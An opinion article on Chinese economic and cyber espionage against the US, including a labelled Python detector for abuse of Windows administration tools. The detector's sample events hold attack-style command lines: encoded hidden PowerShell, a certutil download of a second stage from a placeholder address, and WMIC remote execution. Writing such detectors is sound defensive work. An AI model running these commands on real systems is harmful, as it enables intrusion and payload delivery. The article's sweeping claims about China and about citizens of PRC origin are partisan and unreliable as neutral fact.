by Stephen H. Campbell
This is Part I of a two-part series on China. Part I focuses on espionage.
US and UK intelligence agencies recently warned healthcare organizations about nation-state efforts to steal intellectual property related to research on vaccines and treatments for the SARS-CoV-2 virus. Multiple countries are engaged in this espionage. Why? Beyond the scientific research and knowledge needed to mitigate the existential risks associated with the pandemic, it is evident that whoever comes up with a vaccine first and is able to manufacture it in mass quantities stands to make huge financial and reputational gains. In terms of capability and intent to execute such an espionage campaign, one nation-state is conspicuous: the very nation-state where the virus originated.
China has the largest coordinated program of intellectual property (IP) theft in the world. Since the 1980s, appropriation of Western technology has been at the heart of the Chinese Communist Party’s (CCP’s) strategy for economic growth. Reflecting on its 5,000-year history, the relatively recent demise of the Qing Dynasty and the so-called “Century of Humiliation” at the hands of European colonial powers, the Chinese nation is patiently working towards restoring what it sees as its rightful place in the world. Like the British and the Americans before them, the Chinese realize that economic strength is the key to global power and the “Rejuvenation of the Chinese Nation”. It is also the key to feeding its population of over 1.3 billion, lifting another 400 million of its citizens out of poverty, and meeting the expectations of the 20 million workers coming into the jobs market each year.
China has demonstrated remarkable economic growth in recent decades. Starting with Deng Xiaoping's Open Door Policy, launched in 1978, encouraged by overtures from President Nixon that led to full diplomatic relations in 1979, and emboldened by its accession to the World Trade Organization in 2001, China surpassed the US as the world's largest trading nation in 2013. Its system of state-led capitalism exploits the international trading system to the fullest. China does not play by the rules of the international order the US established after World War II. In fact, the Chinese Communists see neoliberalism, constitutional democracy and universal rights as anathema to their own values. The Party would as soon replace this US-led order with one crafted in its own image. But it knows its time has not yet come. So, it plays along.
Luring Western multinationals onto its own turf with the prospect of the world's largest consumer market, China plays hardball, demanding that these companies transfer their technology and knowhow to promote the indigenous innovation of Chinese companies. Through its so-called talent programs, China recruits leading-edge researchers from abroad to stimulate its own R&D base. In the US alone there are some 90 nonprofit organizations affiliated with the Chinese Communist Party whose task is to spot and assess US technical personnel and bring them into China's technology transfer apparatus.
Armed with this acquired technology and knowledge, China then promotes its own “National Champions” through generous state subsidies, bank lines of credit and tax breaks, so that they not only bootstrap a domestic market, but also enter the global market, to compete against the very Western companies from whom they acquired the technology and knowhow in the first place. Communist Party “cells” and party-appointed board members ensure alignment with CCP strategy.
To accelerate this process, China has built up an unparalleled system of industrial and economic espionage, or what its science and technology planning documents refer to as "collection by other means". Its principal target is the US. Since the early 2000s, roughly 80% of economic espionage cases brought in the US have involved actors working for the Chinese government, and about 60% of trade secret theft cases have had ties to China. China's success in rapidly acquiring intellectual property that hard-working Americans created over years of research and development rests on long-term planning, extensive grant-funded research such as the 863 National High Technology R&D Program, and a huge network of émigrés.
Commercial espionage is largely the domain of China's civilian intelligence agency, the Ministry of State Security, while military espionage falls under the purview of the People's Liberation Army. Still, many of China's spies are not full-time assets at all, but naturalized US citizens of PRC origin who engage in "aggressive elicitation" through their professions or studies. Their actions may not rise to the level of criminality defined under 18 U.S.C. § 1831 (economic espionage) or § 1832 (theft of trade secrets), but they are nonetheless injurious to the US economy and the US national interest.
While some willingly risk their careers for their home country, others are coerced through threats to their families back home. A further group consists of employees stationed in the US by Chinese companies such as Huawei. Chinese law obliges such companies to assist the country's intelligence agencies: Article 7 of the 2017 National Intelligence Law states that "any organization or citizen shall, in accordance with the law, support, provide assistance, and cooperate in national intelligence work, and guard the secrecy of any national intelligence work they are aware of."
Human assets, of course, carry considerable risk of embarrassment for Beijing if they are caught. By contrast, cyberespionage offers plausible deniability and minimal risk. The "take" can also be considerable, as the Chinese intrusions into Anthem, OPM, Marriott and Equifax illustrate. Since Mandiant (acquired by FireEye in 2014) outed the PLA-affiliated Advanced Persistent Threat group APT1 ("Comment Crew") in February 2013, FireEye has catalogued at least 25 Chinese APT groups. To try to curb this activity, and with Mandiant's help, President Obama negotiated an agreement with President Xi Jinping in September 2015 in which both sides agreed to refrain from commercially motivated cyber espionage. Predictably, while the volume of detected Chinese cyberespionage attacks against the US dropped in the following year, the thieving continued: attacks became more targeted, and Chinese actors improved their techniques of obfuscation, denial and deception. President Trump took a different tack and deserves credit for calling the Chinese out publicly on their predatory trade practices and wholesale theft of American intellectual property.
To evade detection and frustrate attribution, many Chinese APT groups have switched to open source tooling or to "living off the land" (abusing the legitimate administration tools already present in the target environment once they are in), which leaves defenders fewer custom-malware artifacts to signature. Attack volumes have also returned to pre-agreement levels. In the past two years some of these groups, such as APT10 ("Stone Panda" or "MenuPass"), whose Operation Cloud Hopper campaign compromised Managed Service Providers (MSPs) to reach their customers, and APT17 ("Aurora Panda" or "PIGFISH"), have achieved significant economies of scale through supply chain attacks, often directed at MSPs or telecommunications companies, through which they can reach a broad swathe of government and commercial targets.
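As an added illustration of what "living off the land" looks like from the defender's side (this is example code written for this page, not code from the article or from any vendor report), the following Python scans constructed process-creation events for signed Windows administration binaries launched with arguments, or from parent processes, that rarely occur in routine administration. The binary names are real; the sample events, the rule patterns and the parent-process list are illustrative assumptions, and the host names, users and the 203.0.113.0/24 address are placeholders.

```python
"""Toy "living off the land" detector over process-creation events.

Added example for this page, not code from the article or any vendor.
The events are constructed to resemble Sysmon Event ID 1 / Windows 4688
fields; the rules and the parent-process list are illustrative assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent: str   # parent image path
    image: str    # launched image path
    cmdline: str  # full command line


# Signed Windows binaries that attackers reuse, each paired with the
# argument patterns that separate abuse from routine administration.
LOLBIN_RULES: dict[str, list[tuple[str, str]]] = {
    "powershell.exe": [
        (r"-(enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded PowerShell command"),
        (r"downloadstring|invoke-webrequest|\biwr\b", "PowerShell download cradle"),
    ],
    "certutil.exe": [
        (r"-urlcache\b.*-f\s+https?://", "certutil used as a downloader"),
    ],
    "wmic.exe": [
        (r"/node:.*\bprocess\s+call\s+create\b", "WMIC remote process creation"),
    ],
    "mshta.exe": [
        (r"https?://|vbscript:|javascript:", "mshta remote or inline script"),
    ],
    "rundll32.exe": [
        (r"javascript:|\\\\[^ ]+\.dll,", "rundll32 scriptlet or UNC DLL"),
    ],
}

# Parents from which the tools above almost never launch legitimately.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "w3wp.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the rule names the event matches; an empty list means no finding."""
    image = _basename(event.image)
    parent = _basename(event.parent)
    findings = [
        name for pattern, name in LOLBIN_RULES.get(image, [])
        if re.search(pattern, event.cmdline, re.IGNORECASE)
    ]
    # Context rule: a LOLBin spawned by an Office app or a web server
    # worker is suspicious even with an innocuous-looking command line.
    if image in LOLBIN_RULES and parent in SUSPICIOUS_PARENTS:
        findings.append(f"{image} spawned by {parent}")
    return findings


def scan(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Return only the events that produced at least one finding."""
    return [(e, f) for e in events if (f := classify(e))]


# Constructed sample events (placeholder hosts, users and addresses).
SAMPLE_EVENTS = [
    # 1. Routine admin script: signed tool, plain arguments, launched from the shell.
    ProcessEvent("WS01", "CORP\\admin", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    # 2. Macro payload: hidden, encoded PowerShell spawned by Word.
    ProcessEvent("WS01", "CORP\\jdoe", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # 3. certutil abused to fetch a second stage.
    ProcessEvent("WS02", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/a.dat C:\Users\Public\a.dat"),
    # 4. Lateral movement with WMIC against another host.
    ProcessEvent("WS02", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\wmic.exe",
                 'wmic.exe /node:"FS01" process call create "cmd.exe /c whoami > C:\\Users\\Public\\o.txt"'),
    # 5. Legitimate certutil use: hashing a file. Same binary, no finding.
    ProcessEvent("WS03", "CORP\\admin", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"),
]


if __name__ == "__main__":
    for event, findings in scan(SAMPLE_EVENTS):
        print(f"{event.host} {event.user} {_basename(event.image)}: {', '.join(findings)}")
```

The point of the rules is that the binaries themselves are legitimate and cannot simply be blocked; the signal lies in the combination of command line and parent process, which is why events 3 and 5 (the same certutil.exe) are judged differently. Every pattern has to be baselined against an environment's own administrative activity before it goes into an alerting pipeline, or it will fire on every systems administrator.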
Since the pandemic began, APT41 ("Wicked Panda" or "Winnti Group") has deployed similar tactics, combined with mass exploitation of internet-facing remote access and management technologies, notably the CVE-2019-19781 path traversal flaw in Citrix ADC and Gateway. Several other Chinese APT groups are known to target the healthcare, pharmaceutical or biotechnology sectors, among them Mustang Panda, Emissary Panda, Judgement Panda, Pirate Panda and Electric Panda, but APT41 has been the most active espionage group during the pandemic. Unusually for a Chinese state-sponsored group, APT41 also conducts financially motivated intrusions.
So, what are the chances that China is going to let up on its thievery against US hospitals, pharmaceutical laboratories, and research institutes? Don’t hold your breath. The need to vaccinate 1.3 billion people, the opportunity to be first to market and to demonstrate Chinese international leadership, and the chance to redeem itself for unleashing SARS-CoV-2 on the world, will continue to drive Chinese espionage against the US healthcare sector. Moreover, travel restrictions brought about by the pandemic are creating constraints on China’s non-traditional human collection and on talent program travel. And some multinationals have started to reconfigure their supply chains away from China to other geographies, to avoid a repeat of the business interruptions caused by the pandemic.
All these factors put more pressure on cyberespionage to deliver on the technology transfer promises for biotechnology and biopharmaceuticals made by the CCP in 2015 as part of its strategic 10-year “Made in China 2025” program. Given the self-inflicted economic recession created by the pandemic, the Communists may revise their targets for their next 5-year plan downwards. The plan is due in 2021. We’ll see. In the meantime, don’t count on Chinese espionage letting up any time soon.
In the second part of our series on China, we will explore Chinese influence operations and how they are tied to Chinese espionage. Stay tuned.
US-CERT, Alert AA20-126A, APT Groups Target Healthcare and Essential Services, May 5, 2020, at https://www.us-cert.gov/ncas/alerts/AA20126A.
FBI, People’s Republic of China (PRC) Targeting of COVID-19 Research Organizations, May 13, 2020, at https://www.fbi.gov/news/pressrel/press-releases/peoples-republic-of-china-prc-targeting-of-covid-19-research-organizations.
Jonathan D.T. Ward, China’s Vision of Victory, Atlas Publishing and Media Company, 2019.
James Mulvenon, Beyond Espionage: IP Theft, Talent Programs, and Cyber Conflict with China, Webinar, Harvard Fairbank Center for Chinese Studies, April 22, 2020. Transcript at https://fairbank.fas.harvard.edu/wp-content/uploads/2020/01/Beyond-Espionage-IP-Theft-Talent-Programs-and-Cyber-Conflict-with-China-with-James-Mulvenon.pdf.
Nigel Inkster, “China in Cyberspace”, in Derek S. Reveron (Ed.), Cyberspace and National Security, Georgetown University Press, 2012.
Amy Chang, Warring State. China’s Cybersecurity Strategy, Center for a New American Security, December 2014, at https://www.jstor.org/stable/resrep06327?seq=1#metadata_info_tab_contents.
Bryan Krekel, Patton Adams, and George Bakos, Occupying the Information High Ground: Chinese Capabilities for Computer Network Operations and Cyber Espionage, US-China Economic and Security Review Commission, 2012, at https://nsarchive2.gwu.edu/NSAEBB/NSAEBB424/docs/Cyber-066.pdf.
Paul D. Moore, “How China Plays the Ethnic Card”, The Los Angeles Times, June 24, 1999, at https://www.latimes.com/archives/la-xpm-1999-jun-24-me-49832-story.html.
Alex Newman, “China’s Growing Spy Threat”, The Diplomat, September 19, 2011, at https://thediplomat.com/2011/09/chinas-growing-spy-threat.
Peter Mattis, “Assessing the Foreign Policy Influence of the Ministry of State Security”, China Brief, 11:1, Jamestown Foundation, January 14, 2011, at https://jamestown.org/program/assessing-the-foreign-policy-influence-of-the-ministry-of-state-security.
Bill Gertz, “Chinese Spy Who Defected Tells All”, The Washington Times, March 19, 2009, at https://www.washingtontimes.com/news/2009/mar/19/exclusive-chinese-spy-who-defected-tells-all.
Paul D. Moore, “Spies of a Different Stripe”, The Washington Post, May 31, 1999, at https://www.washingtonpost.com/archive/opinions/1999/05/31/spies-of-a-different-stripe/f547a3e2-60af-4979-bac7-3a31ec09729a.
Christopher Glyer, Dan Perez, Sarah Jones, and Steve Miller, "This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits", FireEye Threat Research, March 25, 2020, at https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html.
FireEye, M-Trends 2020, March 2020, at https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html.
CrowdStrike, Global Threat Report, 2020, at https://www.crowdstrike.com/resources/reports/2020-crowdstrike-global-threat-report.
CrowdStrike, Global Threat Report, 2019, at https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/.
Natasha Bertrand, "China-linked Electric Panda hackers seek US targets, intel agency warns", Politico, April 15, 2020, at https://www.politico.com/news/2020/04/16/china-electric-panda-hackers-seek-us-targets-191220.
Florian Roth, APT Groups and Operations, at https://docs.google.com/spreadsheets/d/e/2PACX-1vTheajUWzRhTK0XhSI3_RnYVtUJvl8mlX8HlThPyCJGK1g5SBecgS78O1oeTFQxDYS0oWlKTg2pNLyb/pubhtml#.
ODNI, NCSC launches National Supply Chain Integrity Month in April, April 1, 2019, at https://www.dni.gov/index.php/ncsc-newsroom/item/1971-ncsc-launches-national-supply-chain-integrity-month-in-april.
Accenture, Cyber Threatscape Report 2018, August 2018, at https://www.accenture.com/_acnmedia/pdf-83/accenture-cyber-threatscape-report-2018.pdf.